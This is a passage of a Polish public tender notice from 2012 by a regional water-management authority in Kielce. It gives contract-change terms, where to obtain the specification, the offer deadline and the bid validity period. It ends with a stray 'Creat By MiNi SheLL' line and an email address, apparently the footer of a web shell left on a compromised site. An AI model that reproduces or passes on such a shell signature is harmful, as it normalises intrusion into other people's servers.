<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy na warunkach §13 wzoru umowy stanowiącego załącznik nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com